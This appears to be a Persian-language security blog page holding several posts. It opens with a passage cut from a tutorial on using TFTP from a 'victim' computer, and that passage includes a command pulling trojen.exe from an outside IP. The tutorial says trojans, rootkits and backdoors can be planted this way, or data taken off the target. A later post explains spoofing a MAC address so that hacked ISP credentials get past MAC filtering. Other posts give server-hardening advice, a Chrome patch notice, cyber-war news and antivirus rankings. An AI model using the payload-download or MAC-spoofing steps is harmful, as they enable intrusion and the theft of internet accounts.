خوب در اين حال يك ايكون هم در قسمت systry سيستم شما ظاهر خواهد شد و اگر firewall هم داشته باشيد از شما سوال مي كند كه اجازه مي دهيد كه اين نرم افزار روي يك پرت listing شود شما درخواست را پاسخ مثبت دهيد و اين نرم افزار روي پرت 69 به حالت گوش دهنده آماده به كار مي شود ولي بايد شما يك تنظيم ديگر نيز انجام دهيد تا همه چيز آماده شود شما در اين مرحله بايد base directory را نيز براي اين نرم افزار مشخص كنيد.
base directory چيست:
base directory دايركتوري است كه اين نرم افزار به عنوان دايركتوري براي عمليات ارسال و دريافت از ان استفاده مي كند يعني اگر چيزي را دانلود كنيد در اين دايركتوري قرار مي گيرد و اگر چيزي در اين پوشه باشد با ذكر نام آن مي توانيد آن را upload كنيد براي مشخص كردن اين پوشه كه به طور پيش فرض mydocument شما مي باشد بايد دكمه settings را كليك كنيد و در پنجره باز شده(شكل زير

در قسمت بالي پنجره آدرس بيس دايركتوري خود را وارد كنيد و روي دكمه Ok كليك كرده و ديگر همه چيز مهياست براي كار با قسمت كلاينت يعني خود TFTP .

Tftp يك نرم افزار تحت كنسول است يعني حالت متني دارد و در شل اجرا مي شود و شما مي توانيد به راحتي از اين نرم افزار كه همراه كامپيوتر قرباني است براي مقاصد خود استفاده كنيد صورت كلي اين نرم افزار بدين صورت است:
Tftp –I HostName [Get/Put] Source Destination
كه سويچ I ترتيب انقال فايل به صورت باينري رو مي ده (البته من مي گم انتقال فايل دقيقا منظورم كلمه انتقال نيست بلكه فقط يك تصوير از فايل ارسال مي شه مثل دستگاه فكس نه اينكه كل فايل از سرور move بشه روي اون كامپيوتر و ديگر اثري از فايل روي سرور نباشه) اگر هم نوشته نشه فكر مي كنم كه فايل به صورت اكتال انتقال داده مي شه در اين مورد دقيقا مطمئن نيستم.
HostName هم آدرس آي پي كامپيوتر سرور است يعني همون كامپيوتري كه TFTPD روش Run شده get براي هنگامي است كه شما مي خواهيد يك فايل رو بفرستيد براي كامپيوتر قرباني و put هنگامي استفاده ميشه كه بخواهيد يك فايل رو روي كامپيوتر خود دانلود كنيد درست عكس زماني است كه شما روي كامپيوتر خود عمل دانلود و آپلود رو انجام مي دهيد. Source آدرس فايل مورد نظر شما براي عمليات آرسال يا دريافت است Destination هم آدرس مقصد است.
مثال:
Tftp –I 213.176.108.156 get trojen.exe c:trojen.exe
كه اين دستور باعث مي شه كه فايلي به اسم trojen.exe از basedirectory كامپيوتري با ip 213.176.108.156 به درايو c: كامپيوتري كه دستور بالا در اون اجرا شده كپي بشه.
به همين سادگي شما مي تونيد trojen , rootkit , backdoor و هر چيز دلخواه ديگري روي كامپيوتر مورد نظر خود دانلود و يا هر اطلاعاتي كه نياز داريد از آن آپلود كنيد.

مرتضی(Germany) بازدید : 153 یکشنبه 17 اردیبهشت 1391 نظرات (1)

 

BlackICE PC Protection

نام يک ديوار آتش معروف و قدرتمند ميباشد که سيستم شما رو کاملا امن نگه ميداره و با توانايی پيشرفته ای که در زمينه ی پيدا کردن حفرهاي نفوذی داره راه نفوذ به سيستم رو بر همه کس و همه چيز ميبنده!


مقوله برقراری امنیت سیستم های کامپیوتری امروزه به عنوان یکی از مهمترین اصول در نگهداری یک شبکه و یا یک سیستم کامپیوتری می باشد. حفاظت از سیستم هایی که اطلاعات مهم تجاری و یا شخصی افراد در آن ها نگهداری می شوند و جلوگیری از دسترسی افراد غیر مجاز و هکرها به سیستم های کامپیوتری در زمره اموری می باشند که بسیاری از شرکت ها و افراد حقیقی نیز در طول سال با صرف هزینه هایی به آن ها عمل می کنند. بسیاری از نرم افزارهای امنیتی موجود در اینترنت که توسط کمپانی های امنیتی برای کاربران و شرکت ها فراهم شده است توانایی این را دارند تا حد زیادی از حملات و نفوذ های موجود به سیستم های کامپیوتری جلوگیری نمایند.


در این مطلب یکی از نرم افزاری را از یک شرکت معتبر قدیمی به شما معرفی می کنیم.


ISS BlackICE PC Protection نام یک نرم افزار حفاظتی می باشد که به وسیله آن کاربران قادر به برقراری یک امنیت مناسب بر روی سیستم های خود خواهند بود. وجود ابزارهای مختلف برقراری امنیت و مدیریت امنیتی سیستم در این نرم افزار ، این توانایی را به کاربر می دهد تا خود برقرار کننده امنیت خود و حافظ اطلاعات مهم خود باشد. این نرم افزار دارای ابزارهای مختلفی می باشد که از جمله آن ها می توان به دیوار آتش حفاظتی قدرتمند آن اشاره نمود که حملات هکرها را به سستم دفع و تقاضاهای مخرب آن ها به سیستم را Block می کند. این نرم افزار محصولی از IBM Internet Security Systems می باشد.
                            



لطفا برای دانلود به ادامه ی مطلب بروید



مرتضی(Germany) بازدید : 116 شنبه 16 اردیبهشت 1391 نظرات (0)

 

Netbios را از TCP/IP جدا کنید


بطور پیش فرض Netbios به TCP/IP مرتبط است لذا نفوذگران قادر به استفاده از فایلهای به اشتراک گذارده شده دستگاه شما هستند لذا


با جدا سازی Netbios از TCP/IP قادر به محافظت از دستگاه خود خواهید شد. در ابتدا NetBEUI را به همراه TCP/IP نصب کنید. حال


Dial-up Adapter را که مورد نیاز برای ارتباط به اینترنت است انتخاب نمایید و به قسمتProperties بروید. به Binding Tab رفته و کلیه


گزینه ها بجز TCP/IP Dialup Adapter را غیرفعال نمایید و OK را بزنید. حال TCP/IP > Dial-up Adapter را انتخاب کنید و به Properties


آن بروید. کلیه پیغام های خطا را حذف کنید و دکمه Binding را بزنید. کلیه گزینه ها را در این قسمت غیر فعال نمایید و OK را بزنید. پیغام


خطای دیگری نمایش داده خواهد شد .اینبار گزیمه NO را انتخاب کنید. Network Properties را ببندید و کامپیوترتان را Restart کنید. این


عملیات Netbios را از TCP/IP مجزا خواهد کرد و شما دیگر نباید نگران دسترسی به فایلهای به اشتراک گذارده شده را از طریق اینترنت

باشید.


 

مرتضی(Germany) بازدید : 133 شنبه 16 اردیبهشت 1391 نظرات (0)

 

رمزگذاری و امنیت درایورها:


اگر از سیستم فایل NTFS در Windows 2000 یا NT استفاده می کنید قادر به محدودکردن دسترسی کاربران هستید. برای ایمن سازی


درایور کلیک راست روی پارتیشن NTFS مورد نظر خود کنید و Properties انتخاب نمایید. در Properties روی دکمه Security کلیک کنید


و دکمه Add را برای نمایش Add Users,computers or groups بزنیددر بالای پنجره روی کاربرانی که می خواهید دسترسی به درایور


داشته باشند آمده و Add را بزنید. این کار را برای افزودن کاربران بیشتر ادامه دهید.

مرتضی(Germany) بازدید : 270 شنبه 16 اردیبهشت 1391 نظرات (0)

از کلمات عبور پیچیده استفاده کنید


کلمات عبور ساده بزرگترین مشکل امینتی را برای سرور شما به وجود می آورند. داشتن کلمات عبور امن و پیچیده (چه برای خود سرور و چه برای کاربرانی که روی سرور قرار دارند) بسیار با اهمیت است.به عنوان مثال اگر کاربر شما ازکلمه ی عبور ی استفاده کند که به راحتی توسط هکر ها قابل حدث زدن باشد در وحله ی اول باعث deface شدن سایت خود شده و اعتبار شرکت شما رو زیر سوال می برد دوم ممکن است از طریق این سایت برای ارسال ویروس و هرزنامه استفاده بشه یا بویسله ی local exploit ها به بقیه سایت ها آسیب برسونه.

* شما می تونید با ویرایش تنظیمات مربوط به کلمات عبور در فایل /etc/login.defs بر اساس نوع کار شما با سرور و درجه ی امنیتی که برای خود در نظر می گیرید کاربران مجبور به داشتن کلمات عبور ایمن کنید.توضیحات کامل در مورد هر یک از پارامتر های فایل login.defs داخل خود فایل و در بالای هر کدام از پارامتر ها موجود می باشد.
معمولا کلمات عبور باید حداقل ۸ حرفی و شامل حرف – عدد و علائم باشند. هیچ وقت از کلمات معنی دار یا تاریخ های مهم استفاده نکنید. اگر می خواهید امن بودن کلمه عبور خود را بررسی کنید می تونید اون را با استفاده از این نرم افزار (http://www.openwall.com/john) تست کنید . اگر ظرف ? – ? ساعت کلمه عبور شما crack شد یعنی کلمه عبور شما امن نیست.
همین سایت یک ابزار دیگه برای بررسی طول کلمات عبور کاربران سرور ساخته است بوسیله ی (http://www.openwall.com/passwdqc) می توانید لیست کاربرانی که از کمات عبور نا امن استفاده میکنند را پیدا کنید و به آنها هشدار دهید .


۳- وب سرور خود را secure کنید
مهمترین قسمتی که با عموم کاربران در ارتباط است و بیشتر مورد حمله و نفوذ قرار می گیرد همان webserver است .
یکی از بهترین ماژول هایی که برای جلوگیری از استفاده ی نابجا از وب سرور استفاده می شود mod_security است که در همین وب لاگ بار ها در موردش صحبت کردیم. البته خود اون فقط یک ابزاره و بقیش برمیگرده به هنر مدیر سرور در طراحی یک سری rule مناسب مخصوص اون سرور برای اطلاعات بیشتر به سایت های http://www.modsecurity.org و http://www.gotroot.com سر بزنید.
توجه کنید که همیشه موقع compile کردن apache گزینه ی suexec حتما فعال باشد. فعال کردن این گزینه به معنی اجرا شدن اسکریپت های CGI تحت owner خود (مالک فایل) می باشد. این گزینه باعث جلوگیری از دسترسی فایل های CGI به فایل های سیستم میشه و همچنین برای جلوگیری از فایل هایی که باعث در سرور می شود بسیار مناسب است.
همچنین بعضی ها اعتقاد داند که باید PHPsuexec هم روی سرور فعال باشه این گزینه باعث میشه که فایل های php هم تحت کاربر خودشون اجرا بشن و با عث بالا بردن امنیت فایل های سیستمی و جلوگیری از استفاده نا بجا از این گونه اسکریپت ها میشه .
می تونید apache رو بوسیله ی دستور /scripts/easyapach که به شما محیط نیمه گرافیکی میده یا با استفاده از خود whm که محیط کاملا گرافیکی داره compile کنید.
با استفاد از فعال کردن گزینه ی open_basedir در قسمت Tweak Security در WHM دسترسی کاربران را از مشاهده ی فایل هایی که خارج پوشه ی مربوط به خودشون هست بگیرید.
اگر خیلی از امنیت سرور خود حراس دارید و نمی توانید تک تک دسترسی ها مسدود کنید می توانید به راحتی در فایل php.ini گزینه ی safe mode را فعال کنید . Safe_mode=on این گزینه هر لحظه چکمیکنه که آیا کسیکه داره این فایل رو اجرا میکنه مالک اون قسمتهست یا نه و خیلی دستورات را خود به خود مسدود میکنه . و راحت ترین راه برای بستن دسترسی های اضافی روی سروره . البته باید گم که با فعال کردن این گزینه حدود ۶۰ درصد از scriptها و کاربران به مشکل برمی خورند.

۴- پارتیشن tmp را secure کنید
بله . مخصوصا گفتم پارتیشن چون بعضی ها اصلا براش partision نمی سازند . البته اگر سرورتون را از یک دیتا سنتر درست حسابی گرفته باشید خودشون موقع نصب سیتم عامل این کار رو انجام میدن.
ولی بازهم کافی نیست در قسمت fstab سیستم باید tmp حتما با گزینه ی nosetuid بسازید یا به اصطلاح mount کنید. این گزینه باعث میشه که تک تک proccess ها با سطح دسترسی executor اجرا شوند .این سطوح دسترسی قبلا در کرنل لینوکس تعریف شده. همچنین بعد از نصب cpanel می توانید گزینه ی noexec رو هم فعال کنید. این گزینه باعث میشه که هیچ فایل اجرایی داخل tmp اجازه ی اجرا شدن نداشته باشه . بعد از اینکه این کار و انجام دادید بوسیله script از پیش آماده ی خود cpanel در آدرس /scripts/securetmp برای پارتیشن tmp خود یک symlink یا شبه لینک به /var/tmp بسازید این خودش برای حفظ امنیت tmp موثره .

۵- غیر فعال کردن compiler ها برای کاربران دیگر
۹۹ درصد کاربران نمی دونن compiler ها روی هاست به چه درد می خوه و اصلا استفاده ای از اونها ندارند پس چه بهتره برای همه ی کاربرانی که استفاده ندارند اون رو disable کنید . این کار رو می تونید در whm در قسمت Compilers Tweak انجام بدید . اکثر باگ های امینتی کشف شده نیار دارند تا همون موقع روی سرور compile بشن با غیر فعال کردن اون حال بسیاری از هکر ها رو میگیرید.

- از maildir به جای mailbox استفاده کنید
ما دونوع ذخیره سازی روی لینوکس داریم برای ایمیل ها . اولی به صورت mail box هست و دومی maildir که گزینه ی دوم بسیار از لحاظ امنیتی بهتره و باعث افزایش سرعت میل سرورتون هم میشه . البته در نسخه ی جدید cpanel به صورت پیش فرض maildir نصب میکنه ولی اگر سرورتون بیش از یک سال عمر داره و روش خاک نشسته بهتره همین حالا به maildir ارتقا بدید. قبلش از اطلاعاتتون backup بگیرید . بنده هیچ مسئولیتی در قبل از دست دادن اونها ندارم . می تونید از پشتیبانی دیتا سنترتون بخواید تا این کار رو انجام بده.

۷- سرویس های اضافی(services and daemons) را غیر فعال کنید
هر سرویس که روی سرور شما فعال باشه و به دیگران اجازه ی وصل شدن به اون وگرفتن اطلاعات به کاربران میده دارای باگ امینتی هست و اگر از اون استفاده نمی کنید باید اون رو ببندیدش . خود لینوکس هم یک سری سرویس های زائد(daemons) داره که برای یک سریس دهنده ی وب نیازی به اونها نیست .
سرویس های رو می تونید در /etc/xinetd.con ویرایش کنید .برای مثال سیستم اشتراک فایل (nfs/statd) یا سیستم مدیریت پرینت (cupsd) و خیلی daemonهای دیگه که توی آموزش مختصر مثل این نمی گنجه همش روبگم. از داخل whm در قسمت Service Manager می تونید سرویس هایی که نیار ندارید رو غیر فعال کنید . مثلا اگر از chat server خود cpanel استفاده نمی کنید اون رو غیر فعالش کنید چون خودش باعث مشکلاتی امنیتی خواهد شد .
این بخش از مهمترین کار هایی که باید یک مدیر سرور انجام بده .

۸- سرور خود را تحت کنترل داشته باشید یا مانیتور کنید


یک ادمین سرور باید به صورت ۲۴ ساعته کلیه قسمت های سرور (نرم افزار ها – فایل های کاربران و …) را تحت کنترل داشته باشد
اینکه نرم افزار های مورد استفاده روی سرور بروز هستند یا خیر و خیلی مسائل دیگر بسیار مهم هستند که این امر فقط با بررسی مداوم و سرکشی به صورت روزانه روی سرور ها عملی است.
البته می توانید حداقل ۹۰ درصد این کار ها را با نوشتن script های دلخواه انجام دهید و شما فقط لوگ های مربوطه را چک کنید و فقط در مواقع ضروری روی سرور لوگین کنید . در این جا برخی از command های پر استفاده رو در این ضمینه ارائه می کنم:

netstat -anp : لیست کلیه connection های باز سرور را به شما می دهد تا به دنبال پورت ها یا نرم افزار های مشکوکی که روی سرور run هستند ولی شما اجاره اجرا شدن به انها نداده اید مشاهده کنید و در صورت لزوم بوسیله firewall دسترسی انها را مسدود کنید.

find / ( -perm -a+w ) ! -type l >> world_writable.txt : این دستور لیست کلیه فایل هایی را که permission 777 دارند و توسط کلیه کاربران روی سرور قابلیت ویرایش دارند را به شما نشان میدهد (داخل فایل txtذخیره می کند) اکثر مشکلات امینی داخل همین فولدر ها اتفاق می افتد.

ls /var/log/ : اکثر لوگ فایل ها داخل پوشه var هستند شما در صورت نیاز به لوگی از از هر سرویس خاصیمی توانید در این فولدر به آن مراجعه کنید (البته لوگ های apache در فولدر /usr/local/apache/logs هست)

در کنار تمامی موارد script های زیادی هستندکه به شما در این کار ها کمک می کنند . البته چیزی که بر حسب نیاز خودتون برای خودتون بنویسید مسلما یک چیز دیگس. یک سری برنامه ها اسمشون رو می نویسم که به درد می خورند .

* Tripwire – این نرم افزاری هست که md5 کلیه فایل های مربوط به سیستم را چک می کنه و در صورتی که این فایل ها تغییر کند به شما هشدار می دهد.
http://tripwire.com or http://sourceforge.net/projects/tripwire
* Chrookit – نرم افزاری برای پیدا کردن trojan – backdoor و غیره بر روی سرور.

http://www.chkrootkit.org

* Rkhunter – نرم افزاری برای پیدا کردن trojan – backdoor و غیره بر روی سرور.

http://www.rootkit.nl/projects/rootkit_hunter.html

* Logwatch – نرم افزاری برای بررسی لوگ ها و فعالیت های سرور به صورت روزانه و تهیه گزارش کامل برای شما

http://logwatch.org

9- حتما یک firewall نرم افزاری داشته باشید !!

اگر firewall سخت افزاری هم دارید باید یک فایروال جداگانه روی سرور داشته باشید .

با استفاده از firewall می تونید لیست پورت هایی که استفاده نمی شوند رو محدود کنید و با این کار حجم زیادی از نرم افزار های backdoor و … را از کار بیاندازید . همچنین با استفاده از firewall می توانید ادرس های ip خاصی را block کنید و حتی در مقابل حملات ddos اسیب ناپذیر باشید.
در زیر لیست پورت های مورد نیاز cpanel امده است( اگر سرویس دیگری ندارید می توانید بقیه پورت ها را به غیر از این ها ببندید . چون نیازی به انها ندارید ) : http://faq.cpanel.net/show.cgi?qa=10468918040763
بهترین firewall از نظر من روی cpanel هم نصب میشه و خوب جواب میده همون APF هست که با rule های خود لینوکس iptables کار می کنه.
اگر شما هم با این نرم افزار کار می کنید اینجا رو مطالعه کنید : http://faq.cpanel.net/show.cgi?qa=108499296901804

10 - همیشه بروز باشید
۸۰ در صد مشکلات امینتی در روز های اول عمرشون براشون patch و update امنیتی میاد یعنی یک bug هرچقدر هم که underground باشد بالاخره براش patch نوشته می شود پس سعی کنید که همیشه از آخرین نسخه های نرم افزار استفاده کنید . نسخه ی کرنل حداقل هر ۲ ماه یک بار باید بروز بشه بقیه نرم افزار ها باید هر هفته چک بشن و در صورت لزوم update بشوند. خود cpanel باید هر روز updateشود به دلیل اینکه هر روز شرکت سی پنل به روز می شود

 

مرتضی(Germany) بازدید : 133 شنبه 16 اردیبهشت 1391 نظرات (0)

آموزش تغییر Mac سیستم به راحتی بدون نرم افزار



واسه تعویض Mac سیستم خودتان نیاز به نرم افزار خاصی نیست بصورت دستی می توانید به راحتی تغییرش بدهید .

ابتدا روی Local Area Connection کلیک راست کنید و Propertise را انتخاب کنید :

صفحه که باز شد روی Configure کلیک کنید

و در صفحه بعدی به تب دوم بروید یعنی روی Advanced کلیک کنید حالا از منوی کشویی Property گزینه Network Address انتخاب کنید و بعد تیک Vaule رو بگذارید و در کادر آدرس Mac جدید را تایپ کنید

Mac را بدون علامت دو نقطه ":" ، مثلاً "001A15D371C5" تایپ کنید و در آخر کار هم ok کنید و تمومه به همین سادگی و به همین خوشمزگی .


MAC اصلی سیستم ما و سیستم User هک شده


MaC سیستم خودمان را که با راست کلیک روی Local Area Connection و انتخاب Status و سپس Details متوانیم ببینیم :

معمولاً در سطر سوم جلوی Physical Address هستش .


خب حالا اگر User و Pass از یک ISP دارید (هک کردید یا ...) و آنها هم از MAC F-i-l-t-e-r ing استفاده می کنند ،

شما نمی توانید به اینترنت وصل شوید چرا که باید با همان Mac باشید تا Error 691 اعصابتان را به هم نریزد ، از کجا ؟! .. :


واسه پیدا کردن MAC اصلی صاحب User از طریق لینک IBSNG آن ISP که توی سایت اصلی معمولاً هست به کنترل پنل User وارد شوید

بعد روی گزارش اتصالات کلیک کنید و در آن صفحه همانطور که توی عکس ضمیمه می بینید روی Details کلیک کنید ، آدرس مک نمایان می شود .

آنرا کپی و طبق آموزش بالا سیستم خود را با آن مک بالا بیاورید .


تصاویر پیوست شده                                             download


download


download

مرتضی(Germany) بازدید : 91 شنبه 16 اردیبهشت 1391 نظرات (0)

 

گوگل یك نسخه جدید از كروم 18 را منتشر كرده است. در این نسخه سه رخنه با درجه امنیتی "بسیارمهم" و دو رخنه با درجه امنیتی "متوسط" را برطرف شده است.



گوگل یك نسخه جدید از كروم 18 را منتشر كرده است. در این نسخه سه رخنه با درجه امنیتی "بسیارمهم" و دو رخنه با درجه امنیتی "متوسط" را برطرف شده است.

شما می توانید با استفاده از به روز رسان بی سرو صدای تعبیه شده در نرم افزار، مرورگر كروم خود را به آخرین نسخه به روز رسانی نمایید یا می توانید آخرین نسخه مرورگر كروم را به


طور مستقیم از google.com/chromeدانلود نمایید.


پنج آسیب پذیری امنیتی اصلاح شده در گوگل كروم نسخه 18.0.1025.168 به شرح زیر است:


آسیب پذیری CVE-2011-3078: یك خطای استفاده پس از آزادسازی در مدیریت اعداد اعشاری.


آسیب پذیری CVE-2012-1521: یك خطای استفاده پس از آزدسازی در تجزیه گر xml.


آسیب پذیری CVE-2011-3079: یك مشكل در اعتبارسنجی IPC.


آسیب پذیری CVE-2011-3080: یك مشكل در شرایط رقابتی در sandbox IPC.


آسیب پذیری CVE-2011-3081: یك خطای استفاده پس از آزادسازی در مدیریت اعداد اعشاری.

منبع:
certcc

مرتضی(Germany) بازدید : 100 شنبه 16 اردیبهشت 1391 نظرات (0)

 

گزارشی در مورد قدرت سایبری ایران

نگرانی بزرگ ایالات متحده آن است که یک حمله سایبری می تواند سیستم شبکه برق رسانی کشور را دچار اختلال کرده و آن را از کار بیاندازد. متخصصین امنیت سایبری می گویند در حال حاضر ایران این توانایی را نداشته ولی می تواند به سیستم بانکی این کشور حمله کرده و اطلاعات مالی درون سیستم را تغییر دهد. در آن صورت، ما شاهد هرج و مرج طولانی مدت در آمریکا خواهیم بود.

iran cyber army

به گزارش بخش خبر پرتال از گرداب به نقل از ایران دیپلماتیک، "تام یلتن"، گزارشگر "ان پی آر" طی گزارشی می نویسد: متخصصین امنیتی سازمان های دولتی و خصوصی مدت مدیدی است که نگران شروع جنگ سایبری با چین و روسیه هستند. این دو کشور قادر به راه اندازی حملات مخرب علیه آن دسته از شبکه های کامپیوتری هستند که سرمایه های حیاتی مانند سیستم های برق رسانی و مالی را کنترل می کنند.


این گزارش اضافه می کند: هم اکنون آنها با تهدید دیگری روبرو شده اند و آن ایران است. Jeffrey Carr، متخصص جنگ سایبری و مشاور وزارت دفاع آمریکا ادعا کرد که ایران منابع و توانایی لازم به عنوان یک رقیب قدرتمند برای درگیری در یک جنگ سایبری را دارد.


وی می افزاید: تخصص ایران در حد توانایی های چین و روسیه نیست، ولیکن برخلاف این دو کشور، ایران در حال حاضر با آمریکا بر سر مسائل هسته ای خود درگیری داشته و احتمال بروز تنش و خصومت بین دو کشور بیشتر است.


تحریم های آمریکا علیه ایران به قدری شدید است که در واقع می توان از آن به عنوان یک جنگ اقتصادی نام برد. به همراه این تحریم ها، تهدیدهای رژیم صهیونیستی در مورد اقدام نظامی علیه تاسیسات هسته ای ایران، می تواند ایرانیان را وسوسه کند تا حمله سایبری علیه آمریکا را در نظر بگیرند.


این گزارش ادامه می دهد: نگرانی ها در این مورد زیاد است. "جیمز کلپر"، رئیس سازمان اطلاعات ملی در اوایل سال جاری طی گزارشی به کنگره مدعی شد که ایران در حال حاضر بیش از هر زمان دیگر خواهان حمله به آمریکا بوده و توانایی سایبری آنها به طرز چشمگیری در سال های اخیر افزایش یافته است.


به عنوان مثال، ایرانیان توانایی قابل توجهی از خود در نظارت بر ارتباطات آنلاین مخالفین نشان داده اند. آنها ارتش سایبری ایران را سازماندهی کرده و توانسته اند سایت توئیتر را از کار انداخته، سایت های دیگر را بلوکه کرده و حملات سایبری پیچیده در داخل ایران انجام دهند.


نگرانی بزرگ ایالات متحده آن است که یک حمله سایبری می تواند سیستم شبکه برق رسانی کشور را دچار اختلال کرده و آن را از کار بیاندازد. متخصصین امنیت سایبری می گویند در حال حاضر ایران این توانایی را نداشته ولی می تواند به سیستم بانکی این کشور حمله کرده و اطلاعات مالی درون سیستم را تغییر دهد. در آن صورت، ما شاهد هرج و مرج طولانی مدت در آمریکا خواهیم بود.


ان پی آر همچنین می نویسد: ژنرال "James Cartwright"، قائم مقام اسبق رئیس ستاد ارتش می گوید: «ایران ممکن است توانایی سایبری خود را به منزله نیروی بازدارنده در قبال تهدیدات خارجی توسعه دهد. اما داشتن این توانایی لزوما برای مقاصد بازدارنده کابرد نداشته و ایران می تواند این اطلاعات را به راحتی در اختیار گروه هایی که تردید کمتری در استفاده از آن دارند، قرار دهد.


"John Brennan"، مشاور مبارزه با تروریسم کاخ سفید اظهار می کند: «برخی از کشورها در حال توسعه تهاجمی توانایی های اینترنتی خود بوده و کشورهایی نیز در تنش با آمریکا می هستند و ما از آن آگاه هستیم. ما با تمام توان خود از حمله کشورهایی که توانایی سایبری و اراده استفاده از آن را دارند، جلوگیری خواهیم کرد.

 

مرتضی(Germany) بازدید : 568 شنبه 16 اردیبهشت 1391 نظرات (0)

با سلام به تازگی تب هک سیستم های شخصی در اینترنت بسیار زیاد شده است

و بسیاری از هکر ها به دنبال هدف های مناسب میگردند من هم وقت رو مناسب دونستم تا این ویدیو رو برای شما کاربران عزیز آماده کنم


در این فیلم با نحوه بستن پورت های باز سیستم آشنا خواهید شد


توضیحات بیشتر را در فیلم خواهید دی

   لطفا برای دانلود به ادامه ی مطلب بروید                                           

مرتضی(Germany) بازدید : 578 شنبه 16 اردیبهشت 1391 نظرات (0)

 

پورت اسکنر پیشرفته چیست

 

پیشرفته اسکنر پورت کوچک، سریع، قوی و آسان برای استفاده از پورت اسکنر برای پلت فرم Win32 است. با استفاده از یک تکنیک


multithread، بنابراین بر ​​روی ماشین های سریع شما می توانید پورت های بسیار سریع اسکن. همچنین شامل شرح پورت های مشترک،


و می تواند اسکن در محدوده بندر از پیش تعریف شده انجام دهد.


         

  لطفا برای دانلود به ادامه ی مطلب بروید                                                                       

مرتضی(Germany) بازدید : 118 شنبه 16 اردیبهشت 1391 نظرات (0)

اینم یه نرم افزار برای بررسی فایل های آلوده و مشکوک همزمان با 43 آنتی ویروس


این نرم افزار با اتصال به سایت ویروس توتال به شما این امکان را می دهد


که فایل آلوده و یا ناشناس و مشکوک را همزمان با 43 آنتی ویروس و نوع آن و اینکه


توسط چه آنتی ویروس های شناسایی شده را نمایش دهد .  



                                                                         dawnload

مرتضی(Germany) بازدید : 90 شنبه 16 اردیبهشت 1391 نظرات (0)

در سال ۱۹۷۰ بصورت عمومی تکنولژی و فن آوری ای اختراع شد که همه ی جهان را دگرگون ساخت و بعد ها به عنوان شبکه ی جهان وب شناخته شد . از آن زمان تا کنون اینترنت بوجود آمد اما با گذشت زمان و وابسته شدن بسیاری از افراد به اینترنت تمام تهدیدات محیطی نیز افزایش یافت و این تهدیدات محیط آنلاین به نگرانی بسیاری برای دولت ها تبدیل شد .
علاوه بر محیط آنلاین ، بخاطر گسترش اطلاعات فردی و سازمانی بر روی کامپیوتر ها و تمایل هکر ها برای بدست آوردن آن ها ، مبحث امنیت به یک مساله ی جدی برای هر کسی تبدیل شده است. اما محافظان ما در این جهان تنها آنتی ویروس ها هستند که هزاران گونه از آن در دنیای وب وجود دارد . اما روز به روز به گستردگی جواب اینکه “کدام آنتی ویروس برای من بهتر است ؟” بعضی از ما را دچار مشکل کرده است . من در این پست قصد دارم با توجه به اطلاعات آماری ، بررسی های متعدد و تجربه شخصی در مورد این نرم افزار ها به این سوال پاسخ بدهم . البته قبل از اینکه ما بررسی را شروع کنیم توجه داشته باشید.که آنتی ویروس ها بر اساس آخرین بروزرسانی ها و آپدیت ها بررسی شده اند پس شماهم همیشه این کار را در نظر بگیرید . بهترین آنتی ویروس ها (البته در حالت پرمیوم)


1- آنتی ویروس بیت دفندر این آنتی ویروس کار خود را به عنوان یک آنتی ویروس غیرموثر آغاز کرد . اما با گذشت زمان تبدیل به یکی از بهترین نرم افزار های آنتی وروس شد . رابط کاربری ساده و کاربرپسند بودن آن سر و صدای زیادی بین کاربران کرده است. به نظر من همه ویژگی های یک آنتی ویروس خوب در این نرم افزار وجود دارد مانند :امنیت بالا ، سهولت استفاده و البته استفاده ی شرکت ناسا از این آنتی ویروس به عنوان سیستم امنیتی خود. این آنتی ویروس بطور دایم کامپیوتر شما را با کمترین استفاده رم اسکن کرده و اگر موردی دیده شد به شما خبر میدهد. همچنین این برنامه بلافاصله پس از یافتن ویروس ها آن ها را بطور موقت غیر فعال میکند و با اجازه ی شما نیز میتواند آن را پاک کند . به نظر من این آنتی ویروس عالی ترین آنتی ویروس موجود در جهان است.



2- آنتی ویروس نورتن در دنیای وب همه چیز در مورد این آنتی ویروس شنیده میشود ، این آنتی ویروس یک امنیت پر قدرت در مقابل عوال خارجی و وب است که هرکسی میتواند از آن لذت ببرد . تنها مشکل نورتن نیاز آن به یک سیستم قدرت مند است تا بتوانند درست کار کند . ولی اگر شما آن را نصب کنید از تقریبا همه ی ویروس ها و نرم افزار مخرب بخاطر گستردگی پایگاه داده این نرم افزار میتوانید سود ببرید ، همچنین این نرم افزار تمام ایمیل ها و دانلود های شما را اسکن میکند.



3- آنتی ویروس نود ۳۲ ;نود ۳۲ یکی از آنتی ویروس هایی که چند سالی به شدت گرفتار و زمین گیر است . نسخه جدید آنتی ویروس Eset nod 32 یکی از جالب ترین آنتی ویروس های تست شده و کارکننده از نظر ایرانی هاست . این آنتی ویروس برای استفاده از نسخه پرمیوم خود پول زیادی دریافت نمیکند و نسخه پرمیوم با نسخه رایگان هیچ فرقی ندارد ، عالی کار میکند ، کمترین حافظه رم را اشغال میکند و یک رابط کاربری فوق العاده دارد . اگر شما بدنبال آنتی ویروسی هستید که بی سر و صدا در پس زمینه کامپیوتر برای شما کار کند نود ۳۲ بهترین گزینه است .



4- آنتی ویروس کسپراسکی ;کسپراسکی یکی از قدیمی ترین آنتی ویروس هایی است که از قدیم تا کنون توانسته است قدرت مانور خود را نگه دارد . یکی از بهترین و قدیمی ترین ویژگی های این آنتی ویروس ، اسکن سریع صفحات وب و دانلود های شماست . این یک نرم افزار خوب برای لپ تاب های شما که بیشتر در امر کسب و کار فعالیت میکنید می باشد و همچنین بیشتر کارشناسان این آنتی ویروس را برای امنیت اینترنت و وب توصیه میکنند .



5- آنتی ویروس ZoneAlarm; من باید به این اعتراف کنم که آنتی ویروس مورد علاقه ی من این آنتی ویروس میباشد . من برای یک دوره ی بسیار طولانی از این آنتی ویروس استفاده کردم و هیچ چیز بدی که در مورد آن میگویند را در آن ندیدم . یکی از بهترین ویژگی ها این آنتی ویروس رایگان، فایروال قدرتمند آن است . اما این آنتی ویروس نیز همانند آنتی ویروس نورتون تشنه به حافظه ی رم کامپیوتر است و برای استفاده عالی از همه ی امکانات آن باید به یک کامپیوتر قوی مجهز باشید .



6-آنتی ویروس مکافی ۲۰۱۲ پلاس; اگر شما یه روش امنیتی قدیمی علاقه مند هستید میتوانید از این آنتی ویروس استفاده کنید . این آنتی ویروس یکی از قدیمی ترین آنتی ویروس های موجود در بازار است . حتما همه ی شما در مورد این آنتی ویروس شنیده اید . البته کارکنان شرکت مکافی امسال آنتی ویروس خوبی را به بازار عرضه کرده اند و بهترین ویژگی این آنتی ویور ارائه ی حفاظت بسیار خوب است .



